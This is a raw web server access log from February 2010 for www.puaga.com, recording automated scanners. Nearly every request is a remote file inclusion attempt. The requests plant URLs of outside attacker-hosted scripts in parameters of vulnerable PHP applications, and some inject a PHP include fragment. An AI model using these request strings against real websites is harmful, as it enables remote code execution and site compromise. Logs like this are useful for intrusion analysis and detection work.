125.141.196.78 - - [12/Feb/2010:09:40:00 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:40:00 -0800] "GET /logs/access_100128.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:40:43 -0800] "GET /logs/access_100114.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:40:53 -0800] "GET /logs/access_100114.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:40:57 -0800] "GET /logs/access_100104.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:40:57 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:40:57 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:41:00 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:41:02 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:41:02 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:41:02 -0800] "GET /logs/access_100104.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:41:14 -0800] "GET /logs/access_100104.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:41:14 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:41:14 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:41:21 -0800] "GET /logs/access_100104.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:41:21 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:41:21 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:41:22 -0800] "GET /logs/access_100114.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:42:01 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:42:01 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:42:01 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:42:19 -0800] "GET /logs/access_100203.log%20%20//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:42:19 -0800] "GET /logs//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:42:20 -0800] "GET /?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:42:33 -0800] "GET /logs/access.log%20%20//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.188.252.55 - - [12/Feb/2010:09:42:37 -0800] "GET /logs/access_100104.log%20%20//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.188.252.55 - - [12/Feb/2010:09:42:37 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.188.252.55 - - [12/Feb/2010:09:42:37 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:09:43:57 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:09:43:57 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:44:27 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:44:27 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:44:32 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:09:44:35 -0800] "GET /phphtml.php?htmlclass_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:09:44:40 -0800] "GET /logs/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:09:44:40 -0800] "GET /logs/access_100109.log%20%20/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:45:32 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:45:45 -0800] "GET /logs/access_100203.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:09:45:56 -0800] "GET /logs/access_100203.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:47:50 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:47:53 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:47:56 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:47:57 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:51:01 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:09:51:36 -0800] "GET /logs/access_100112.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:09:51:37 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:09:51:37 -0800] "GET /appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:09:51:37 -0800] "GET /logs/access_100120.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:09:52:28 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:09:52:28 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:09:53:12 -0800] "GET /logs/access_100126.log%20%20/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:09:54:47 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:09:54:47 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:09:54:48 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:09:54:54 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:08 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:08 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:08 -0800] "GET /logs/access_100202.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:10 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:10 -0800] "GET /logs/access_100202.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:10 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:11 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:11 -0800] "GET /logs/access_100202.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:11 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:17 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:17 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:17 -0800] "GET /logs/access_100202.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:20 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:20 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:55:20 -0800] "GET /logs/access_100202.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:09:56:02 -0800] "GET /logs/access_100208.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:09:56:02 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:09:56:02 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:09:56:08 -0800] "GET /logs/access_100109.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:09:56:17 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:09:56:17 -0800] "GET /logs//?path%5Bdocroot%5D=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:09:56:18 -0800] "GET /?path%5Bdocroot%5D=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:58:10 -0800] "GET /logs/access_100112.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:58:36 -0800] "GET /logs/access_100112.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:09:59:16 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:09:59:54 -0800] "GET /logs/index.php?stranica=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:09:59:54 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:09:59:55 -0800] "GET /index.php?stranica=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:10:00:24 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:10:00:24 -0800] "GET /index.php?stranica=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:10:00:25 -0800] "GET /logs/index.php?stranica=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:01:44 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:03:50 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:03:50 -0800] "GET /logs/access_100109.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:03:50 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:10:04:06 -0800] "GET /index.php?var=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:10:04:21 -0800] "GET /logs/access_100126.log/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:10:04:27 -0800] "GET /logs/access_100131.log/index.php?stranica=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:10:04:48 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:10:04:48 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:10:04:52 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:10:04:52 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:10:04:55 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:10:05:03 -0800] "GET /logs/access_100131.log/index.php?stranica=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:10:05:04 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:10:05:23 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:10:06:39 -0800] "GET /logs/access_100112.log/index.php?var=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:10:06:39 -0800] "GET /logs/index.php?var=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:10:06:39 -0800] "GET /index.php?var=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:10:10:22 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:10:10:23 -0800] "GET /?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:10:10:30 -0800] "GET /logs/access_100126.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:11:36 -0800] "GET /logs/access_100112.log/index.php?var=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:11:36 -0800] "GET /logs/index.php?var=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:11:36 -0800] "GET /index.php?var=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:10:12:07 -0800] "GET /logs/access_100103.log%20%20//admin/admin_news_bot.php?root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
